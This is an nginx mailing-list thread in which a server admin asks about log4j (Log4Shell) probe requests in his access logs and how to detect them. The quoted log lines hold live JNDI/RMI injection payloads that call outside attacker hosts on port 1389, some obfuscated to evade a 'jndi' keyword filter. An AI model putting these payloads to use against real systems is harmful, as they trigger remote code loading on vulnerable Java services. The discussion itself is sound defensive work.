Welcome! Log In Create A New Profile

Advanced

Re: 200 html return to log4j exploit

December 20, 2021 02:10PM
On Mon, 20 Dec 2021 17:49:48 +0000
Jay Caines-Gooby <jay@gooby.org> wrote:

> The request is for your index page "GET / HTTP/1.1"; that's why your
> server responded with 200 OK. The special characters are in the
> referer and user-agent fields, as a log4j system would also try to
> interpolate these, and thus be vulnerable to the exploit.
>
> On Mon, 20 Dec 2021 at 04:02, lists@lazygranch.com
> <lists@lazygranch.com> wrote:
>
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. Howerver I am confused why a returned a 200 for
> > this request. The special characters in the URL are confusing.
> >
> > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET /
> > HTTP/1.1" 706
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}"
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
> >
> > log_format main '$status $remote_addr - $remote_user
> > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> > '"$http_user_agent" "$http_x_forwarded_for"';
> >
> > That is my log format from the nginx.conf.
> >
> > I now have a map to catch "jndi" in both url and agent. So far so
> > good not that it matters much. I just like to gather IP addresses
> > from hackers and block their host if it lacks eyeballs,
> > _______________________________________________


Thanks for both replies. Note the hackers have done a work around to
get past my simple "map" detection. Matching jndi is not
sufficient. Examples:

103.107.245.1 - - [20/Dec/2021:14:38:15 +0000] "GET / HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary }" "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

103.107.245.1 - - [20/Dec/2021:14:38:16 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A 1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "${${::-j}ndi:rmi://188.166.57.35:1389 /Binary}" "-"

I can't really tell if this Indonesian IP address is an ISP or not so I guess I will let them slide from the firewall. The other IP is for Digital Ocean. I have some droplets there and yeah there are bad actors on the service. Kind of sad I have to block the vendor I use but probably AWS, Linode, etc is just as bad. For the price of the service you simply can't police it at scale.

Probably another stupid question but what is up with this ${ stuff? I
need some terminology to google and read up on this.
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Subject Author Posted

200 html return to log4j exploit

gariac December 19, 2021 11:04PM

Re: 200 html return to log4j exploit

Francis Daly December 20, 2021 04:20AM

Re: 200 html return to log4j exploit

Jay Caines-Gooby December 20, 2021 12:52PM

Re: 200 html return to log4j exploit

gariac December 20, 2021 02:10PM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 268
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 500 on July 15, 2024
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready